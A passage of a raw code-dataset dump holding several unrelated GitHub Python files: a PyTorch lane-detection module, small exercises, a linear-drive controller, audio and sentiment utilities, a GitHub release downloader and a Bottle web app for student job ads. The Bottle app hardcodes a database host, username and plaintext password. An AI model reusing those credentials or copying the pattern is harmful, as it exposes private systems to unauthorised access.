plot_neurons(mc.meta, key, tp)\n stashfig(f\"neurons-{key}-{tp}\")\n plt.close()\n\n","repo_name":"neurodata/maggot_models","sub_path":"notebooks/127.2-BDP-more-silly-model.py","file_name":"127.2-BDP-more-silly-model.py","file_ext":"py","file_size_in_byte":7618,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"30557319945","text":"import torch.nn as nn\nimport torch\nimport torch.nn.functional as F\n\n\nclass RESA(nn.Module):\n def __init__(self):\n super(RESA, self).__init__()\n self.iter = 5 # 5\n chan = 128 # 128\n fea_stride = 8 # 原图相对于此时的特征图大小的倍数\n self.height = 720 // fea_stride # 46\n self.width = 1280 // fea_stride # 80\n self.alpha = 2 # 2\n conv_stride = 9 # 9\n\n for i in range(self.iter):\n conv_vert1 = nn.Conv2d(chan, chan, (1, conv_stride),padding=(0, conv_stride//2), groups=1, bias=False)\n conv_vert2 = nn.Conv2d(chan, chan, (1, conv_stride),padding=(0, conv_stride//2), groups=1, bias=False)\n\n setattr(self, 'conv_d'+str(i), conv_vert1)\n setattr(self, 'conv_u'+str(i), conv_vert2)\n\n conv_hori1 = nn.Conv2d(chan, chan, (conv_stride, 1),padding=(conv_stride//2, 0), groups=1, bias=False)\n conv_hori2 = nn.Conv2d(chan, chan, (conv_stride, 1),padding=(conv_stride//2, 0), groups=1, bias=False)\n\n setattr(self, 'conv_r'+str(i), conv_hori1)\n setattr(self, 'conv_l'+str(i), conv_hori2)\n\n idx_d = (torch.arange(self.height) + self.height //2**(self.iter - i)) % self.height\n setattr(self, 'idx_d'+str(i), idx_d)\n\n idx_u = (torch.arange(self.height) - self.height //2**(self.iter - i)) % self.height\n setattr(self, 'idx_u'+str(i), idx_u)\n\n idx_r = (torch.arange(self.width) + self.width //2**(self.iter - i)) % self.width\n setattr(self, 'idx_r'+str(i), idx_r)\n\n idx_l = (torch.arange(self.width) - self.width //2**(self.iter - i)) % self.width\n setattr(self, 'idx_l'+str(i), idx_l)\n\n def forward(self, x):\n x = x.clone()\n\n for direction in ['d', 'u']:\n for i in range(self.iter):\n conv = getattr(self, 'conv_' + direction + str(i))\n idx = getattr(self, 'idx_' + direction + str(i))\n x.add_(self.alpha * F.relu(conv(x[..., idx, :])))\n\n for direction in ['r', 'l']:\n for i in range(self.iter):\n conv = getattr(self, 'conv_' + direction + str(i))\n idx = getattr(self, 'idx_' + direction + str(i))\n x.add_(self.alpha * F.relu(conv(x[..., idx])))\n\n return x\n\n\n\nif __name__ == \"__main__\":\n import torch\n img = torch.rand(1, 128, 90, 160).cuda()\n model = RESA().cuda()\n output = model(img)\n print(output.size)\n\n\n# fea torch.Size([4, 128, 46, 80])\n# resa torch.Size([4, 128, 46, 80])\n# seg torch.Size([4, 7, 368, 640])\n# exist torch.Size([4, 6])\n","repo_name":"033186ZSY/RLSNet-master","sub_path":"rlsnet/resa.py","file_name":"resa.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"416421459","text":"import os\nimport click\nfrom PyInquirer import prompt\n\nfrom distutils.dir_util import copy_tree, remove_tree\nfrom malas_path import config_path, malas_path\n\nquestions = [\n # Learn more in https://github.com/CITGuru/PyInquirer#question-types\n {\n 'type': 'confirm',\n 'name': 'confirmation',\n 'message': 'Configuration already exist, reset to factory?',\n 'default': True\n },\n {\n 'type': 'confirm',\n 'name': 'keep_config',\n 'message': 'Keep config?',\n 'default': True\n },\n\n]\n\n@click.command()\ndef initial():\n \"\"\"\n Initialize folder and other\n \"\"\"\n replace = True\n keep_config = False\n\n if os.path.isdir(config_path):\n answer = prompt(questions)\n replace = answer.get('confirmation')\n keep_config = answer.get('keep_config')\n\n if replace:\n if os.path.isdir(f'{config_path}/config'):\n copy_tree(src=f'{config_path}/config', dst=f'{config_path}/config_backup')\n remove_tree(f'{config_path}/config')\n\n folders = ['config', 'plugins']\n for folder in folders:\n os.makedirs(f'{config_path}/{folder}', exist_ok=True)\n\n copy_tree(src=f'{malas_path}/malas_config/', dst=config_path)\n\n if keep_config:\n copy_tree(src=f'{config_path}/config_backup', dst=f'{config_path}/config')\n remove_tree(f'{config_path}/config_backup')\n\n click.echo(f\"Creating configuration folder in {config_path}\")\n else:\n click.echo(\"Nothing change\")\n","repo_name":"tegarimansyah/malas-cli","sub_path":"malas-cli/malas_init.py","file_name":"malas_init.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16506645697","text":"def diccionario_geringoso(listaDePalabras):\n diccionario={}\n for cadena in listaDePalabras:\n cadenaFinal=''\n for c in cadena:\n cadenaFinal+=c\n if c=='a':\n cadenaFinal+= 'pa'\n elif c=='e':\n cadenaFinal+= 'pe'\n elif c=='i':\n cadenaFinal+= 'pi'\n elif c=='o':\n cadenaFinal+= 'po'\n elif c=='u':\n cadenaFinal+= 'pu'\n \n diccionario[cadena]=cadenaFinal\n return diccionario \n\nlista=['banana', 'manzana', 'mandarina']\nprint(diccionario_geringoso(lista))\n","repo_name":"CristianAmici/python","sub_path":"clase02/diccionario_geringoso.py","file_name":"diccionario_geringoso.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2186468294","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\na, b = map(int, input().split())\r\nc, d = map(int, input().split())\r\nprime = [1] * 1001\r\n\r\nfor i in range(2, int((1000)**0.5)+1):\r\n if prime[i] == 1:\r\n for j in range(i+i, 1001, i):\r\n prime[j] = 0\r\n\r\nif b >= c:\r\n tmp = sum(prime[c:b+1])\r\nelse:\r\n tmp = 0\r\n\r\nyt = sum(prime[a:b+1]) - tmp\r\nyj = sum(prime[c:d+1]) - tmp\r\n\r\nif tmp % 2 == 0:\r\n if yt > yj:\r\n print(\"yt\")\r\n else:\r\n print(\"yj\")\r\nelse:\r\n if yt >= yj:\r\n print(\"yt\")\r\n else:\r\n print(\"yj\")","repo_name":"rloldl-c/algorithm","sub_path":"백준/Silver/25632. 소수 부르기 게임/소수 부르기 게임.py","file_name":"소수 부르기 게임.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"14859459098","text":"import math\nfrom technosoftlineardrive.tml import *\nimport struct\n\nSERVO_DEFAULT_ACCELERATION = 0.1751 # IU\nSERVO_DEFAULT_SPEED = 31.831 # IU\n\nMAX_ACCELERATION = 0.3 # IU\nMAX_SPEED = 170 # IU\n\n# Here be some dragons. Kind and friendly dragons, but dragons nonetheless.\n\ndef create_linear_drive_program(pos_amount,\n acceleration=SERVO_DEFAULT_ACCELERATION,\n speed=SERVO_DEFAULT_SPEED):\n \"\"\"\n Create a assembly tml program for the linear drive.\n \n :param pos_amount: amount to move linear drives position relatively.\n :param acceleration: how fast the linear drive will accelerate to it's desired speed.\n :param speed: how fast the linear drive will move to desired position.\n :return assemble_program: a complete assembly program to run on the linear drive.\n \"\"\"\n assert (acceleration <= MAX_ACCELERATION)\n assert (speed <= MAX_SPEED)\n\n def pack_int(num):\n \"\"\"\n Pack a integer to a struct for using in serial communication.\n \n :param num: integer to pack.\n :return num: as a packed integer for use in serial communication. \n \"\"\"\n return struct.unpack(\"HH\", struct.pack(\"i\", num))\n\n def to_fixed_point(num):\n \"\"\"\n Pack a number to a fixed point type and pack it as a struct.\n \n :param num: number to pack to a fixed point type.\n :return num: as a packed fixed point for use in serial communication. \n \"\"\"\n return pack_int(math.floor(num * 0x10000)) # Magic? No.\n\n # Unpack into word16\n (pos_low, pos_hi) = pack_int(pos_amount)\n (accel_low, accel_hi) = to_fixed_point(acceleration)\n (speed_low, speed_hi) = to_fixed_point(speed)\n # Return the program\n return assemble_program([\n CACC(accel_low, accel_hi),\n CSPD(speed_low, speed_hi),\n CPOS(pos_low, pos_hi),\n CSET(0xDFFF, 0x0000),\n CSET(0xBFC1, 0x8701),\n CSET(0xFFFF, 0x4000),\n UPD()#,\n # NOTMC(),\n # WAIT()\n ])\n\n","repo_name":"PUM-9/TreeD","sub_path":"technosoft-linear-drive/src/technosoftlineardrive/assemblyprogram.py","file_name":"assemblyprogram.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9229176081","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 10 11:37:11 2023\n\n@author: User\n\"\"\"\nimport pandas as pd\nfrom textblob import Blobber #pip install textblob\nfrom textblob_fr import PatternTagger, PatternAnalyzer #pip install textblob-fr\ntb = Blobber(pos_tagger=PatternTagger(), analyzer=PatternAnalyzer())\n\n\n\ndef note(nb):\n if nb > 0 : \n return \"Positif\"\n elif nb < 0 : \n return \"Négatif\"\n else:\n return \"Neutre\"\n\n\n\ndef analyse_sentiment(data):\n dictionnaire = {}\n for auteur in data[\"author\"].unique():\n dictionnaire[auteur] = []\n \n data.loc[max(data.index)+1] = [0,0,\"\",0,0,\"\",\"\",\"\"]\n parole = data[\"author\"][0]\n text = \"\"\n for i in data.index:\n if parole == data[\"author\"][i]:\n text += \" \"+data[\"text\"][i]\n else: \n analysis = note(tb(text).sentiment[0])\n dictionnaire[data[\"author\"][i-1]].append(analysis)\n parole = data[\"author\"][i]\n text = data[\"text\"][i]\n \n \n \n sentiment = {}\n sentiment[\"global\"] = [0,0,0]\n for auteur in dictionnaire.keys():\n sentiment[auteur] = [dictionnaire[auteur].count('Positif'),dictionnaire[auteur].count('Neutre'),dictionnaire[auteur].count('Négatif')]\n \n sentiment[\"global\"][0] += dictionnaire[auteur].count('Positif')\n sentiment[\"global\"][1] += dictionnaire[auteur].count('Neutre')\n sentiment[\"global\"][2] += dictionnaire[auteur].count('Négatif')\n \n return sentiment\n\n\n \n\n","repo_name":"TMayling/IR","sub_path":"Sentiment_Analysis_Signature.py","file_name":"Sentiment_Analysis_Signature.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73143685288","text":"# pylint: disable=E1101:no-member\r\n\"\"\"\r\nAudio utils.\r\n\"\"\"\r\nfrom typing import Optional\r\nimport torch\r\nfrom torch.nn.functional import pad\r\nfrom torchaudio.functional import resample\r\n\r\n\r\ndef convert_audio(\r\n audio: torch.Tensor,\r\n sample_rate: int,\r\n target_sample_rate: int,\r\n target_channels: int,\r\n target_duration: Optional[float] = None,\r\n normalize: bool = False,\r\n fadeout_duration: float = 0.1,\r\n) -> torch.Tensor:\r\n \"\"\"\r\n Converts an audio tensor to the desired sample rate, number of channels, and duration using various transformations.\r\n\r\n Args:\r\n audio (torch.Tensor): The input audio tensor of shape (n_sounds, n_channels, n_samples).\r\n sample_rate (int): The sample rate of the input audio tensor.\r\n target_sample_rate (int): The target sample rate to convert the input audio tensor to.\r\n target_channels (int): The target number of channels to convert the input audio tensor to.\r\n target_duration (float): The target duration of the output audio tensor in seconds.\r\n Note that the input audio tensor will be padded or truncated (with a fade out - see below)\r\n to the target length if necessary. Pass None to leave the input audio tensor unchanged. (Default: None)\r\n normalize (bool): Whether to normalize the input audio tensor. (Default: False)\r\n fadeout_duration (float): The duration of the fadeout in seconds. If not specified, defaults to 100ms.\r\n (Default: 0.1)\r\n\r\n Returns:\r\n torch.Tensor: The transformed audio tensor of the specified sample rate, number of channels, and duration.\r\n \"\"\"\r\n assert audio.shape[-2] in [1, 2], \"Audio must be mono or stereo.\"\r\n\r\n # convert to mono if required\r\n audio = (\r\n audio.mean(-2, keepdim=True)\r\n if (target_channels == 1) and (audio.shape[-2] == 2)\r\n else audio\r\n )\r\n\r\n # convert to stereo if required\r\n if (target_channels == 2) and (audio.shape[-2] == 1):\r\n audio = audio.expand(*audio.shape[:-2], target_channels, -1)\r\n\r\n # resample to target sample rate\r\n if sample_rate != target_sample_rate:\r\n audio = audio.clone() # might raise an error without\r\n audio = resample(audio, sample_rate, target_sample_rate)\r\n\r\n # truncate to target duration and apply fade out if required\r\n if target_duration is not None:\r\n target_num_samples = int(target_duration * target_sample_rate)\r\n\r\n if audio.shape[-1] > target_num_samples:\r\n fadeout_num_samples = int(fadeout_duration * target_sample_rate)\r\n fadeout = (\r\n torch.linspace(1, 0, fadeout_num_samples)\r\n if fadeout_num_samples > 0\r\n else 1.0\r\n )\r\n audio = audio[..., :target_num_samples]\r\n audio[..., -fadeout_num_samples:] *= fadeout\r\n\r\n # zero-pad to target duration if required\r\n elif audio.shape[-1] < target_num_samples:\r\n audio = pad(audio, (0, target_num_samples - audio.shape[-1]))\r\n\r\n # normalize if required\r\n audio = (\r\n (audio / audio.abs().amax((-2, -1), keepdim=True)) * 0.99\r\n if normalize\r\n else audio\r\n )\r\n\r\n return audio\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print(\"utils/audio.py run successfully.\")\r\n","repo_name":"pcmbs/preset-embedding_audio-model-selection","sub_path":"src/utils/audio.py","file_name":"audio.py","file_ext":"py","file_size_in_byte":3284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9854431652","text":"import requests\nimport os\nfrom iidda_api import read_config\nimport aiohttp\nimport asyncio\nfrom iidda_api import get_release_list\nfrom aiohttp_client_cache import FileBackend\nfrom appdirs import *\n\n\ndef convert_to_raw(url):\n '''Converts github.com url to raw.githubusercontent.com url\n\n Args:\n url (str): link with base url \"github.com\" to a file stored on github\n\n Returns:\n str: equivalent url with \"raw.githubusercontent.com\" base url\n '''\n return url.replace(\"github.com\", \"raw.githubusercontent.com\").replace(\"/blob/\", \"/\")\n\n\nasync def get_pipeline_dependencies(dataset_name, version=\"latest\", version_tag=\"\"):\n '''Downloads all pipeline_dependencies of a dataset\n\n Args:\n dataset_name (str): name of the dataset\n version (str, int, optional): version of the dataset\n version_tag (str, optional): version prefix of dataset (e.g. \"v9-\" indicates version 9 of a particular dataset)\n\n Returns:\n list: list of tuples. Each tuple contains a file's name and content\n '''\n # Get access token\n ACCESS_TOKEN = read_config('access_token')\n # make cache directory\n cache_path = user_cache_dir(\"iidda-api-cache\", \"\")\n if not os.path.isdir(cache_path):\n os.makedirs(cache_path)\n # Cache configurations\n release_list_cache = FileBackend(\n cache_name=cache_path + \"/release_list\"\n )\n\n releases = asyncio.run(get_release_list(\n ACCESS_TOKEN, release_list_cache, clear_cache=False))\n\n # filter through and sort all releases of this name ascending by version\n release_list = filter(\n lambda release: release['name'] == dataset_name, releases)\n release_list = sorted(\n release_list, key=lambda release: int(release['body'][8:]))\n\n # check if dataset is contained in repo\n if not release_list:\n return \"This dataset does not exist in the releases\"\n\n if version == \"latest\":\n version = len(release_list)\n\n if int(version) > len(release_list):\n return f\"The supplied version is greater than the latest version. The latest version is {len(release_list)}\"\n\n release = release_list[int(version) - 1]\n\n headers = {\n 'Authorization': 'token ' + ACCESS_TOKEN,\n 'Accept': 'application/octet-stream'\n }\n\n for asset in release['assets']:\n if asset['name'] == dataset_name + \".json\":\n response = requests.get(asset['url'], stream=True, headers=headers)\n if response.ok:\n dataset_metadata = response.json()\n\n async def main():\n async with aiohttp.ClientSession(headers={'Authorization': 'token ' + ACCESS_TOKEN, 'Accept': 'application/vnd.github.v3.raw'}) as session:\n tasks = []\n for relatedIdentifier in dataset_metadata['relatedIdentifiers']:\n if relatedIdentifier['relatedIdentifierType'] == \"URL\":\n if isinstance(relatedIdentifier['relatedIdentifier'], list):\n for link in relatedIdentifier['relatedIdentifier']:\n url = convert_to_raw(link)\n task = asyncio.ensure_future(\n download_dependencies(url, session))\n tasks.append(task)\n else:\n url = convert_to_raw(\n relatedIdentifier['relatedIdentifier'])\n task = asyncio.ensure_future(\n download_dependencies(url, session))\n tasks.append(task)\n\n files = await asyncio.gather(*tasks)\n return files\n\n async def download_dependencies(url, session):\n if url == \"on mcmaster math server (file to large for github)\":\n file_name = file_name = version_tag + dataset_name + \"/\" + \\\n version_tag + dataset_name + \"_dependencies/\" + url + \".txt\"\n return (file_name, \"on mcmaster math server (file to large for github)\")\n else:\n file_name = version_tag + dataset_name + \"/\" + version_tag + \\\n dataset_name + \"_dependencies/\" + \\\n os.path.basename(url[34:])\n async with session.get(url) as response:\n file_content = await response.read()\n return (file_name, file_content)\n\n return asyncio.run(main())\n else:\n return \"Failure in getting assets from GitHub {}\\n{}\".format(response.status_code, response.text)\n","repo_name":"canmod/iidda-tools","sub_path":"python/iidda_api/get_pipeline_dependencies.py","file_name":"get_pipeline_dependencies.py","file_ext":"py","file_size_in_byte":4861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4482114356","text":"# *-* coding:utf-8 *-*\n#!/usr/bin/python\n'''\n*******Creator*******\nSe varje funktion\n'''\nimport bottle\nfrom modules import log\nfrom modules import handleUsers\nfrom modules import addmod\nfrom bottle import route, get, post, run, template, error, static_file, request, redirect, abort, response, app\nfrom beaker.middleware import SessionMiddleware\nimport MySQLdb\n\ndb = None\ncursor = None\n\ndef call_database():\n\t#Skriven av: Jari & Jacob (Parprogrammering)\n\tglobal db\n\tglobal cursor\n\tdb = MySQLdb.connect(host=\"195.178.232.16\", port=3306, user=\"AC8240\", passwd=\"hejhej123\", db=\"AC8240\")\n\tcursor = db.cursor()\n\treturn cursor\n\ndef hang_up_on_database():\n\t#Skriven av: Jari & Jacob (Parprogrammering)\n\tglobal db\n\tdb = db.close()\n\n'''*********Routes*********'''\n\n@route('/')\ndef startPage():\n\t#Skriven av: Jari\n\tif log.is_user_logged_in() == True:\n\t\tredirect('/admin')\n\telse:\n\t\tredirect('/login')\n\n\n'''*********Login*********'''\n\n@route('/login')\ndef login():\n\t#Skriven av: Jacob\n\tif log.is_user_logged_in() == True:\n\t\tredirect('/admin')\n\telse:\n\t\treturn template('login', pageTitle='Logga in')\n\n\n@route('/ajax', method=\"POST\")\ndef ajax_validation():\n\t#Skriven av: Jacob\n\tcursor = call_database()\n\tresult = log.ajax_validation(cursor)\n\thang_up_on_database()\n\tif result == False:\n\t\treturn 'error'\n\telse:\n\t\treturn 'ok'\n\n@route('/do_login', method='POST')\ndef do_login():\n\t#Skriven av: Jacob\n\tcursor = call_database()\n\tresponse = log.login(cursor)\n\thang_up_on_database()\n\tif response == True:\n\t\tredirect('/admin')\n\telse:\n\t\treturn return_error('Tyvärr - användaren finns inte!')\n\n\n@route('/log_out')\ndef log_out():\n\t#Skriven av: Jacob\n\tlog.log_out()\n\tredirect('/login')\n\n@route('/admin')\ndef admin():\n\t#Skriven av: Jacob & Jari\n\t#Mindre uppdateringar: Sofia\n\tlog.validate_autho() #kontrollerar om användaren är inloggad\n\tcursor = call_database()\n\tusername = log.get_user_name(cursor) #hämtar användarens namn från DB (returnerar en sträng)\n\tuserid = log.get_user_id_logged_in() #hämtar användarens id\n\tuser_level = log.get_user_level(cursor) #kollar om användaren är uppdragstagare eller student (returnerar 1 eller 2)\n\n\tif user_level == 1:\n\t\tads_untreated = []\n\t\tads_ongoing = []\n\t\tads_finished = []\n\n\t\tads_to_apply_on=addmod.available_ads(userid, cursor)\n\t\tall_ads=addmod.sort_by_status(userid, cursor)\n\t\tfor each in all_ads:\n\t\t\tif each[7]=='Obehandlad':\n\t\t\t\tads_untreated.append(each)\n\t\t\telif each[7]=='Vald':\n\t\t\t\tads_ongoing.append(each)\n\t\t\telif each[7]=='Avslutad':\n\t\t\t\tads_finished.append(each)\n\t\tdenied_missions = addmod.get_denied_missions(userid, cursor)\n\t\thang_up_on_database()\n\t\treturn template('student_start',finished_ads=ads_finished, avail_ads=ads_to_apply_on, accepted_on=ads_ongoing, pending_ad=ads_untreated, user_id=userid, user=username, level=\"student\", pageTitle = 'Start', denied_missions=denied_missions)\n\n\telse:\n\t\temployer_ads = addmod.get_my_ads(userid, cursor)\n\t\tstudents = addmod.students_that_applied(userid, cursor)\n\t\thang_up_on_database()\n\t\treturn template('employer_start', user=username, user_id=userid, level=\"arbetsgivare\", annons=employer_ads, pageTitle = 'Start', students_application = students)\n\n@route('/about_us')\ndef about_us_page():\n\t#Skriven av Sofia\n\tif log.is_user_logged_in() == False:\n\t\treturn template('about_us', pageTitle = 'Om Questway', user_autho = \"3\")\n\telse:\n\t\tcursor = call_database()\n\t\tusername = log.get_user_name(cursor) #hämtar användarens namn från DB (returnerar en sträng)\n\t\tuserid = log.get_user_id_logged_in() #hämtar användarens id\n\t\tuser_level = log.get_user_level(cursor) #kollar om användaren är uppdragstagare eller student (returnerar 1 eller 2)\n\t\thang_up_on_database()\n\t\treturn template('about_us', pageTitle = 'Om Questway', user=username, user_autho=user_level, user_id=userid)\n\n@route('/help')\ndef help_page():\n\t#Skriven av Sofia\n\tif log.is_user_logged_in() == False:\n\t\treturn template('help.tpl', pageTitle = 'Hjälp - Questway', user_autho = \"3\")\n\telse:\n\t\tcursor = call_database()\n\t\tusername = log.get_user_name(cursor) #hämtar användarens namn från DB (returnerar en sträng)\n\t\tuserid = log.get_user_id_logged_in() #hämtar användarens id\n\t\tuser_level = log.get_user_level(cursor) #kollar om användaren är uppdragstagare eller student (returnerar 1 eller 2)\n\t\thang_up_on_database()\n\t\treturn template('help.tpl', pageTitle = 'Hjälp - Questway', user = username, user_autho=user_level, user_id = userid)\n\n'''********Create-user********'''\n@route('/create')\ndef create_user():\n\t#Skriven av: Jacob\n\tif log.is_user_logged_in()==False:\n\t\treturn template('create_user', pageTitle='Student | Uppdragsgivare')\n\telse:\n\t\tredirect('/admin')\n\n@route('/create_student')\ndef create_student():\n\t#Skriven av: Jacob\n\tif log.is_user_logged_in()==False:\n\t\treturn template('create_student', pageTitle='Skapa profil')\n\telse:\n\t\tredirect('/admin')\n\n@route('/create_employer')\ndef create_employer():\n\t#Skriven av Jacob\n\tif log.is_user_logged_in()==False:\n\t\treturn template('create_employer', pageTitle='Skapa profil')\n\telse:\n\t\tredirect('/admin')\n\n@route('/ajax_create_user', method=\"POST\")\ndef ajax_create_validation():\n\t#Skriven av Jacob\n\tcursor = call_database()\n\tresult = handleUsers.ajax_new_user_validation(cursor)\n\thang_up_on_database()\n\tif result['result'] == False and result['error'] == 'Bad input':\n\t\treturn 'Bad input'\n\telif result['result'] == False and result['error'] == 'User exists':\n\t\treturn 'User exists'\n\telse:\n\t\treturn 'ok'\n\n@route('/do_create_user/', method = 'POST')\ndef do_create_user(user):\n\t#Skriven av Jacob\n\tglobal db\n\tif log.is_user_logged_in()==False:\n\t\tcursor = call_database()\n\t\tif user == \"student\":\n\t\t\tresponse = handleUsers.create_student(cursor)\n\t\telif user == \"employer\":\n\t\t\tresponse = handleUsers.create_employer(cursor)\n\t\telse:\n\t\t\thang_up_on_database()\n\t\t\treturn return_error(\"Något har blivit fel!\")\n\t\tdb.commit()\n\t\tif response['result'] == True:\n\t\t\tlog.log_in_new_user(response['email'], response['password'], cursor)\n\t\t\thang_up_on_database()\n\t\t\tredirect('/admin')\n\t\telse:\n\t\t\thang_up_on_database()\n\t\t\treturn return_error(response['error'])\n\telse:\n\t\tredirect('/admin')\n\n@route('/profiles/')\ndef profiles(user):\n\t#Skriven av Jacob\n\ttry:\n\t\tuser = int(user)\n\texcept:\n\t\treturn return_error('Användaren finns inte!')\n\n\tcursor = call_database()\n\tuser_profile_data = handleUsers.show_student_profile(user, cursor)\n\tis_user_logged_in = log.is_user_logged_in()\n\n\tgrading_ads = addmod.grading_ads(user, cursor)\n\tgrading_skills = addmod.get_ad_skills(user, cursor)\n\tusername = \"\"\n\tthis_user = False\n\tif is_user_logged_in == True:\n\t\tuser_levle = log.get_user_level(cursor)\n\t\tusername = log.get_user_name(cursor)\n\t\tlogged_in_id = log.get_user_id_logged_in()\n\t\tif logged_in_id == user:\n\t\t\tthis_user = True\n\telse:\n\t\tuser_levle = 0\n\n\thang_up_on_database()\n\n\tif user_profile_data['exists'] == True:\n\t\teducation_info = user_profile_data['education_info']\n\t\tstudent_info = user_profile_data['student_info']\n\t\tstudent_name = student_info[0] + ' ' + student_info[1]\n\t\treturn template('user_profile', user = username, user_autho = user_levle, user_id = user, student= student_info, education = education_info, pageTitle = student_name, grading = grading_ads, grading_skills = grading_skills, this_user=this_user )\n\n\telse:\n\t\treturn return_error('Användaren finns inte!')\n\n@route('/edit_mission//', method=\"POST\")\ndef edit_mission(user,ad_id):\n\t#Skriven av Jacob\n\tglobal db\n\ttry:\n\t\tint(user)\n\t\tint(ad_id)\n\texcept:\n\t\treturn return_error('Något har blciti fel!')\n\tlog.validate_autho()\n\tif int(log.get_user_id_logged_in()) == int(user):\n\t\tcursor = call_database()\n\t\taddmod.edit_mission(ad_id, cursor)\n\t\tdb.commit()\n\t\thang_up_on_database()\n\t\tredirect('/profiles/' + str(user))\n\treturn return_error('Ej behörighet!')\n\n\n'''********Ad-management********'''\n\n@route('/do_new_ad')\ndef do_new_ad():\n\t#Skriven av Jari\n\t'''Returns a view where the logged-in employer can fill in information for a new ad'''\n\tcursor = call_database()\n\tlog.validate_autho()\n\tif log.get_user_level(cursor) == 2:\n\t\tusername=log.get_user_name(cursor)\n\t\thang_up_on_database()\n\t\treturn template('adsform.tpl',user=username, pageTitle = 'Annonser')\n\telse:\n\t\thang_up_on_database()\n\t\treturn return_error('Behörighet saknas')\n\n@route('/make_ad', method=\"POST\")\ndef ad_done():\n\t#Skriven av Jari\n\t'''Creates a new ad in the DB'''\n\tglobal db\n\tcursor = call_database()\n\tlog.validate_autho()\n\tresponse=addmod.do_ad(cursor)\n\tdb.commit()\n\thang_up_on_database()\n\tif response['result']==True:\n\t\tredirect('/admin')\n\telse:\n\t\treturn return_error(response['error'])\n\n\n@route('/make_ad')\ndef no_get():\n\t#Skriven av Jari\n\tredirect('/admin')\n\n\n'''*****Delete ad*****'''\n\n@route('/del_ad/', method=\"POST\")\ndef del_ad(which_ad):\n\t#Skriven av Jari\n\t'''Deletes a specifik ad in the DB'''\n\tglobal db\n\tcursor = call_database()\n\tlog.validate_autho()\n\tif log.get_user_level(cursor) == 2:\n\t\tuser_logged_in=log.get_user_id_logged_in()\n\t\taddmod.erase_ad(which_ad, user_logged_in, cursor)\n\t\tdb.commit()\n\t\thang_up_on_database()\n\t\tredirect('/allMissions')\n\telse:\n\t\thang_up_on_database()\n\t\treturn return_error('Behörighet saknas')\n\n\n'''****Students can apply on an ad****'''\n\n@route('/apply_on_ad/', method=\"POST\")\ndef apply_for_mission(which_ad):\n\t#Skriven av Jari\n\t'''Onclick on template - student applies on a specifik ad'''\n\tglobal db\n\tcursor = call_database()\n\tlog.validate_autho()\n\tresponse=addmod.applying_for_mission(which_ad, cursor)\n\tdb.commit()\n\thang_up_on_database()\n\tif response['result']==True:\n\t\tredirect('/admin')\n\telse:\n\t\treturn return_error(response['error'])\n\n'''****All the ads and their applications listed***'''\n\n@route('/allMissions')\ndef list_applied_students():\n\t#Skriven av Jari\n\t'''lists all ads with their specific application status'''\n\tcursor = call_database()\n\tlog.validate_autho()\n\tif log.get_user_level(cursor) == 2:\n\t\tuser_id=log.get_user_id_logged_in()\n\t\tusername=log.get_user_name(cursor)\n\t\trelevant_adds=addmod.get_my_ads(user_id, cursor)\n\t\tstudents_application = addmod.students_that_applied(user_id, cursor)\n\t\tfeedback_info = addmod.get_given_feedback_for_employers(user_id, cursor)\n\t\thang_up_on_database()\n\t\treturn template('adds.tpl',user_id=user_id, user=username, adds=relevant_adds, students=students_application, pageTitle='Alla uppdrag', feedback = feedback_info)\n\telse:\n\t\thang_up_on_database()\n\t\treturn return_error('Behörighet saknas')\n\n\n@route('/select_student//')\ndef accepted_ones(ad, appliersID):\n\t#Skriven av Jari\n\tglobal db\n\tcursor = call_database()\n\tif log.get_user_level(cursor) == 2:\n\t\taddmod.who_got_accepted(ad, appliersID, cursor)\n\t\tdb.commit()\n\t\thang_up_on_database()\n\t\tredirect ('/allMissions')\n\telse:\n\t\thang_up_on_database()\n\t\treturn return_error('Behörighet saknas')\n\n@route('/ad_done/', method=\"POST\")\ndef ad_done(ad):\n\t#Skriven av Jari\n\tglobal db\n\ttry:\n\t\tint(ad)\n\texcept:\n\t\treturn return_error('Nu har något blivit fel!')\n\tcursor = call_database()\n\tlog.validate_autho()\n\tif log.get_user_level(cursor) == 2:\n\t\tresponse = addmod.move_ad_to_complete(int(ad), cursor)\n\t\tdb.commit()\n\t\thang_up_on_database()\n\t\tif response['response'] == False:\n\t\t\treturn return_error(response['error'])\n\t\telse:\n\t\t\tredirect('/allMissions')\n\telse:\n\t\thang_up_on_database()\n\t\treturn return_error('Behörighet saknas')\n\n\n@route('/give_feedback/')\ndef give_feedback(ad_nr):\n\t#Skriven av Jacob\n\tcursor = call_database()\n\tlog.validate_autho()\n\tif log.get_user_level(cursor) == 2 and log.get_user_id_logged_in() == addmod.get_ad_creator_id(cursor, int(ad_nr)):\n\t\tusername = log.get_user_name(cursor)\n\t\thang_up_on_database()\n\t\treturn template('feedback', adnr=ad_nr, pageTitle = 'Ge feedback', user=username )\n\telse:\n\t\thang_up_on_database()\n\t\treturn return_error('Behörighet saknas')\n\n\ndef return_error(error_message):\n\t#Skriven av Jacob\n\tcursor = call_database()\n\tif log.is_user_logged_in == True:\n\t\tuserid = log.get_user_id_logged_in()\n\t\tuser_level = log.get_user_level(cursor)\n\t\tusername = log.get_user_name(cursor)\n\t\treturn template('error_message', pageTitle = error_message, user = username, user_autho = user_level, user_id = user, error_message=error_message)\n\telse:\n\t\treturn template('error_message', pageTitle = error_message, user_autho = 3, error_message=error_message)\n\n\n'''********Övriga Routes********'''\n\n@error(404)\ndef 